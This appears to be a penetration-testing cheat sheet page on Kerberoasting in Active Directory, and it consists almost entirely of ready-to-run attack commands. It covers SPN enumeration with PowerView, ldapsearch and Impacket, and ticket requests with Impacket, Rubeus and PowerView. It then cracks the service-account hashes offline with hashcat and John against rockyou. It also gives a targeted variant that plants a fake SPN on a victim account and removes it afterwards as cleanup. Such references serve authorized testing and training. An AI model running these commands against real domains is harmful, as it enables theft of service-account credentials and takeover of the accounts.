Kerberoasting - BookJMP

Overview

Any domain user can request TGS ticket for any service with SPN. Ticket encrypted with service account password hash → crack offline.

Find SPNs

PowerView

Get-DomainUser -SPN | Select SamAccountName, ServicePrincipalName

ldapsearch

ldapsearch -x -H ldap://DC_IP -b "DC=domain,DC=local" -D "[email protected]" -w 'pass' "(servicePrincipalName=*)" sAMAccountName servicePrincipalName

Impacket

impacket-GetUserSPNs DOMAIN/user:password -dc-ip DC_IP

Request Tickets

Impacket (Linux)

impacket-GetUserSPNs DOMAIN/user:password -dc-ip DC_IP -request
impacket-GetUserSPNs DOMAIN/user:password -dc-ip DC_IP -request -outputfile hashes.txt

Rubeus (Windows)

.\Rubeus.exe kerberoast
.\Rubeus.exe kerberoast /outfile:hashes.txt
.\Rubeus.exe kerberoast /user:svc_account

PowerView

Request-SPNTicket -SPN "MSSQLSvc/sql.domain.local"

setspn (Built-in)

setspn -T DOMAIN -Q */*

Crack

Hashcat

hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt

John

john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt

Targeted Kerberoasting

Set SPN on user you want to attack (needs GenericAll/GenericWrite).

Set-DomainObject -Identity targetuser -SET @{serviceprincipalname='fake/spn'}
.\Rubeus.exe kerberoast /user:targetuser
Set-DomainObject -Identity targetuser -Clear serviceprincipalname   # Cleanup

Quick Reference

Task	Command
Find SPNs	`impacket-GetUserSPNs DOMAIN/user:pass -dc-ip DC`
Request	Add `-request -outputfile hashes.txt`
Crack	`hashcat -m 13100 hashes.txt wordlist`
Rubeus	`.\Rubeus.exe kerberoast`

Documentation Index

​Overview

​Find SPNs

​PowerView

​ldapsearch

​Impacket

​Request Tickets

​Impacket (Linux)

​Rubeus (Windows)

​PowerView

​setspn (Built-in)

​Crack

​Hashcat

​John

​Targeted Kerberoasting

​Quick Reference

Overview

Find SPNs

PowerView

ldapsearch

Impacket

Request Tickets

Impacket (Linux)

Rubeus (Windows)

PowerView

setspn (Built-in)

Crack

Hashcat

John

Targeted Kerberoasting

Quick Reference